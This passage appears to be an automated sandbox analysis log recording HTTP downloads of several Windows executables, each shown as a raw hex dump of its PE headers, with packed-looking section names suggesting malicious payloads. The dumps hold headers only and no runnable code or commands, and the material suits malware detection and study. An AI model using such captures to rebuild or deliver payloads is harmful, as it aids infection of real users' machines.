88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:06:32 GMTContent-Type: application/octet-streamContent-Length: 3271168Last-Modified: Mon, 11 Nov 2024 22:53:04 GMTConnection: keep-aliveETag: "67328ad0-31ea00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 32 00 00 04 00 00 bd 4f 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c de 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c de 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 77 76 66 74 6a 70 64 00 30 2b 00 00 b0 06 00 00 30 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 70 64 61 65 68 68 74 00 10 00 00 00 e0 31 00 00 04 00 00 00 c4 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 31 00 00 22 00 00 00 c8 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:07 GMTContent-Type: application/octet-streamContent-Length: 1888768Last-Modified: Mon, 11 Nov 2024 22:04:59 GMTConnection: keep-aliveETag: "67327f8b-1cd200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 3e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 20 05 00 00 00 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 40 05 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 74 6c 6d 70 6c 63 6e 00 60 1a 00 00 50 30 00 00 5a 1a 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 78 69 61 67 73 69 00 10 00 00 00 b0 4a 00 00 04 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 b0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:07 GMTContent-Type: application/octet-streamContent-Length: 1888768Last-Modified: Mon, 11 Nov 2024 22:04:59 GMTConnection: keep-aliveETag: "67327f8b-1cd200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 3b a0 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 be 03 00 00 c2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 48 a9 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 3e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 20 05 00 00 00 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 40 05 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 74 6c 6d 70 6c 63 6e 00 60 1a 00 00 50 30 00 00 5a 1a 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 64 78 69 61 67 73 69 00 10 00 00 00 b0 4a 00 00 04 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 b0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:19 GMTContent-Type: application/octet-streamContent-Length: 3161088Last-Modified: Mon, 11 Nov 2024 22:52:43 GMTConnection: keep-aliveETag: "67328abb-303c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 40 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 30 00 00 04 00 00 1a 1d 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 77 61 68 6a 6e 69 67 00 80 2a 00 00 b0 05 00 00 80 2a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 70 66 67 70 66 6b 7a 00 10 00 00 00 30 30 00 00 04 00 00 00 16 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 30 00 00 22 00 00 00 1a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:23 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 78 64 62 7a 63 6a 6a 00 20 1a 00 00 80 4f 00 00 16 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 78 73 6e 6c 68 70 7a 00 10 00 00 00 a0 69 00 00 04 00 00 00 8c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 69 00 00 22 00 00 00 90 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:31 GMTContent-Type: application/octet-streamContent-Length: 2786816Last-Modified: Mon, 11 Nov 2024 22:51:27 GMTConnection: keep-aliveETag: "67328a6f-2a8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 cc cc 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 69 63 67 79 6e 77 00 40 2a 00 00 a0 00 00 00 26 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 79 68 69 66 6e 63 6f 00 20 00 00 00 e0 2a 00 00 04 00 00 00 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 64 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 23:07:38 GMTContent-Type: application/octet-streamContent-Length: 1815040Last-Modified: Mon, 11 Nov 2024 22:52:56 GMTConnection: keep-aliveETag: "67328ac8-1bb200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 b0 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 69 00 00 04 00 00 66 58 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 